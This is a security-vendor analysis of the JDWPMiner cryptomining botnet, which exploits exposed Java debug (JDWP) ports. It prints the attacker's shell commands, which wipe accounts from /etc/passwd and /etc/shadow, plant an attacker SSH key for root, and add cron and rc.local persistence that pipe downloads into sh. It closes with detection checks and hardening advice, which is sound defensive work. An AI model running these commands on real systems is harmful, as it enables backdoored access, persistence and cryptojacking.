Analysis of JDWPMiner Mining Trojan: Remote Debugging with Java Causes Hidden Risks

Recently, the Alibaba Cloud Security Team detected a malicious mining attack by exploiting the RCE vulnerability of JDWP. JDWP is widely used in the development and debugging of Java applications, while Java is widely used in the development of e-commerce, office applications, CMS, and other platforms that are closely related to daily life. If remote debugging is not closed during the software release, major hidden risks will be left behind. JDWPMiner uses this feature for profitable intrusion.

Alibaba Cloud security experts have found that the botnet exploits the Java Debug RCE by downloading mining binary files from malicious download source files to achieve mining. Then, it persists through Crontab, writes the secret key to authorized_keys to get remote access, and runs four methods to rebound the shell to take full control of the host. Thus, user assets will achieve great harm.

Alibaba Cloud Security continuously monitors the BOT, finding that its spread has increased recently. Users are advised to pay attention to BOT defense.

Means of Spread

Phase Analysis

Protocol Analysis

The Java Debug Wire Protocol Transport Interface (JDWP) is the communication protocol between the debugger and the target JVM. In the JDPA system, the format of the interaction data between the frontend debugger and the backend debuggee is described by JDWP. This protocol defines the request command, response data, and error code in detail to ensure communication between the JVMTI and JDI clients. The debugger can obtain values from the VM, including classes, objects, and threads through this protocol.

JDWP is a TCP-based binary packet network protocol, which communicates through command packets and reply packets. The Flags field indicates whether the packet is a command packet or a response packet, and the Command Set defines the command category.

To enable the protocol above, users usually need to modify or in the bin directory of the apache-tomcat installation package. There are two connection methods; dt_shment indicates local debugging and dt_socket indicates remote debugging.

It can also be enabled through the command line:

java -Xdebug -Xrunjdwp:transport=dt_socket,server=y,suspend=n,address=8000 -jar demo.jar

The JDWP protocol does not carry authentication information. Therefore, for a Java application with a debugging port enabled, anyone can debug the application with JDWP. This brings great risks to development and O&M. JDWPMiner uses this feature for profitable intrusion.

Intrusion Analysis

The preceding two methods can result in the JDWP port being opened to the public network. JDWPMiner exploits the RCE vulnerability of JDWP by calling wget in its parent process.

java -server -Xms256m -Xmx2048m -XX:MaxPermSize=256m -Xdebug -Xrunjdwp:transport=dt_socket,server=y,suspend=n,address=8000 -jar demo.jar

Execute the following command:


There are four ways to bounce the shell when running the script, python, perl, nc, and bash. The C2 of script located at Luxembourg’s After the shell is executed, its host will be completely occupied by JDWPMiner.

Then, the call to will be executed in a different way.

wget -O-

Wipe out common records of /etc/passwd with sed:

sed -i 's/^eth0:.*//' /etc/passwd 2>/dev/null;sed -i 's/^eth0:.*//' /etc/shadow 2>/dev/null;sed -i 's/^eth1:.*//' /etc/passwd 2>/dev/null;sed -i 's/^eth1:.*//' /etc/shadow 2>/dev/null;sed -i 's/^sudev:.*//' /etc/passwd 2>/dev/null;sed -i 's/^sudev:.*//' /etc/shadow 2>/dev/null;sed -i 's/^system:.*//' /etc/passwd 2>/dev/null;sed -i 's/^system:.*//' /etc/shadow 2>/dev/null;

Add the public key to the /root/.ssh/authorized_keys:

# add ssh keygrep Glock /root/.ssh/authorized_keys || echo 'ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDFjxDDMcytBQ+57s//0Fah9YVEosmvKMQXspMBi2G6qyF/v0nIE0OH9NhPkG02c8B+7ickaSJU97+UqPRw53mDbOJyT1BKWNbGPMAsLA/wz45O5wUhf/VFQhTpsKBai86N0uO3hjAPybE7fT/RarD45Ip4FUG1ttSw/Au6t1oLenRSAPegsS5b5vrn7OsGdA1kk8Jdk2FkdHBjIAHJtZsVsNLnE08WoAKQV65YWL6J5mnKjkt6bsViMeGAdjCbfgKNDdAnAqPfDHv3p+xIB8GnYwK8bVk4N9r/p4YgiNO+uURIWH0XMPJkvkyX4xco7w8XkyhXzKzRlvz8doXj4SMZ root@Glock' >> /root/.ssh/authorized_keys;chmod 755 /root /root/.ssh /root/.ssh/authorized_keys 2>/dev/null;chown root:root /root /root/.ssh /root/.ssh/authorized_keys 2>/dev/null;

Persist with Crontab:

# Add To Crontabgrep m247 /var/spool/cron/root || echo "0 * * * * wget --quiet -O- 2>/dev/null|sh>/dev/null 2>&1" >> /var/spool/cron/rootgrep m247 /var/spool/cron/crontabs/root || echo "0 * * * * wget --quiet -O- 2>/dev/null|sh>/dev/null 2>&1" >> /var/spool/cron/crontabs/rootgrep m247 /etc/crontab || echo "0 * * * * root wget --quiet -O- 2>/dev/null|sh>/dev/null 2>&1" >> /etc/crontabgrep m247 /etc/cron.d/0hourly || echo "0 * * * * root wget --quiet -O- 2>/dev/null|sh>/dev/null 2>&1" >> /etc/cron.d/0hourly

Persist with cron.d:

# Add to Cron.decho -e '#!/bin/sh\n\nwget --quiet -O- 2>/dev/null|sh>/dev/null 2>&1' > /etc/cron.hourly/0;chmod +x /etc/cron.hourly/0;chattr +i /etc/cron.hourly/0;echo -e '#!/bin/sh\n\nwget --quiet -O- 2>/dev/null|sh>/dev/null 2>&1' > /etc/cron.daily/0;chmod +x /etc/cron.daily/0;chattr +i /etc/cron.daily/0;echo -e '#!/bin/sh\n\nwget --quiet -O- 2>/dev/null|sh>/dev/null 2>&1' > /etc/cron.weekly/0;chmod +x /etc/cron.weekly/0;chattr +i /etc/cron.weekly/0;echo -e '#!/bin/sh\n\nwget --quiet -O- 2>/dev/null|sh>/dev/null 2>&1' > /etc/cron.monthly/0;chmod 777 /etc/cron.monthly/0;chattr +i /etc/cron.monthly/0;

Persist with rc.local by determining different system versions:

if [[ -e /etc/debian_version ]]; thenRCLOCAL='/etc/rc.local';echo -e '#!/bin/sh\n\nwget --quiet -O- 2>/dev/null|sh>/dev/null 2>&1' > $RCLOCAL; chmod +x $RCLOCAL;elif [[ -e /etc/centos-release || -e /etc/redhat-release ]]; thenRCLOCAL='/etc/rc.d/rc.local'echo -e '#!/bin/sh\n\nwget --quiet -O- 2>/dev/null|sh>/dev/null 2>&1' > $RCLOCAL; chmod +x $RCLOCAL;chmod +x $RCLOCAL;elseecho -e '#!/bin/sh\n\nwget --quiet -O- 2>/dev/null|sh>/dev/null 2>&1' > /etc/rc.local;chmod +x /etc/rc.local;fi

Download mining Trojans with curl and wget:

curl -s || wget --quiet -O /dev/null

Security Recommendations

Verification Methods

  • Local Authentication: Execute the following command. If the result is returned, it means the Debug port is enabled.
ps -ef | grep jdwp | grep -v 'grep'
  • Remote Authentication: After telnetting the port, enter the command JDWP-Handshake. If the JDWP-Handshake is returned, it means the vulnerability exists.
{ echo "JDWP-Handshake"; sleep 20 } | telnet remote_host remote_port


  1. Search for or, and comment out the line with transport=dt_socket.
  2. If running Docker, modify ENV JPDA_ENABLE=1 to 0 in the dockerfile.

Detailed Security Recommendations

1. Close the JDWP port or disable it from the Internet. If debugging is performed in the staging environment, disable the Debug mode after completion.

2. Disable the Java Debug mode

3. Cloud Firewall monitors the latest emergence of RCE on the Internet in real-time using big data. The overall time from RCE disclosure to response is less than three hours, effectively stopping customer assets from being attacked by RCE vulnerabilities. It supports three to seven layers of protocols to meet the protection of HTTP protocols for websites and the four-layer defense of a large number of TCP/UDP protocols. By default, the current version of Cloud Firewall supports defense against the remote command execution vulnerability of the Java debugging interface.

4. The Cloud Firewall intelligent policies can be customized based on historical traffic to provide the best practices for exposed face convergence in line with the customer’s business. Moreover, users can achieve maximum Internet exposure convergence of assets through one-click delivery or self-selection. By doing this, the risks of inappropriate exposure of JDWP ports to the outside world can be avoided, preventing the scanning behavior of cyberspace mapping in reinsurance mode.


SSH Public Key

ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDFjxDDMcytBQ+57s//0Fah9YVEosmvKMQXspMBi2G6qyF/v0nIE0OH9NhPkG02c8B+7ickaSJU97+UqPRw53mDbOJyT1BKWNbGPMAsLA/wz45O5wUhf/VFQhTpsKBai86N0uO3hjAPybE7fT/RarD45Ip4FUG1ttSw/Au6t1oLenRSAPegsS5b5vrn7OsGdA1kk8Jdk2FkdHBjIAHJtZsVsNLnE08WoAKQV65YWL6J5mnKjkt6bsViMeGAdjCbfgKNDdAnAqPfDHv3p+xIB8GnYwK8bVk4N9r/p4YgiNO+uURIWH0XMPJkvkyX4xco7w8XkyhXzKzRlvz8doXj4SMZ root@Glock




Alibaba Tech

First hand and in-depth information about Alibaba’s latest technology → Facebook: “Alibaba Tech”. Twitter: “AlibabaTech”.




First-hand & in-depth information about Alibaba's tech innovation in Artificial Intelligence, Big Data & Computer Engineering. Follow us on Facebook!

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

Challenges faced by Networks During Pandemic(COVID-19)

Trust and security during marketplace exchanges

Cloud Workload Protection Platform (CWPP)

My Favourite Virtual Machines

{UPDATE} WordsFinderPro Suomi/Finnish Hack Free Resources Generator

dAuth — Distributed Authentication and use in Roaming contexts

(Left): Benchmark showing block commit time and Tx, Rx from each node in the network (Right): Size of the blocks by block num

Why blocking 3rd party cookies won’t stop adtech

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Alibaba Tech

Alibaba Tech

First-hand & in-depth information about Alibaba's tech innovation in Artificial Intelligence, Big Data & Computer Engineering. Follow us on Facebook!

More from Medium

Manually Renew Let’s Encrypt TLS Server Certificate in Kubernetes

Neural Network, Recurrent Neural Network, Backpropagation Algorithm, Vanishing Gradient Problem.

Feature Selection Notes Summary — Univariate, Multivariate, Wrapper & Embedded methods

Wireless Distributed Computing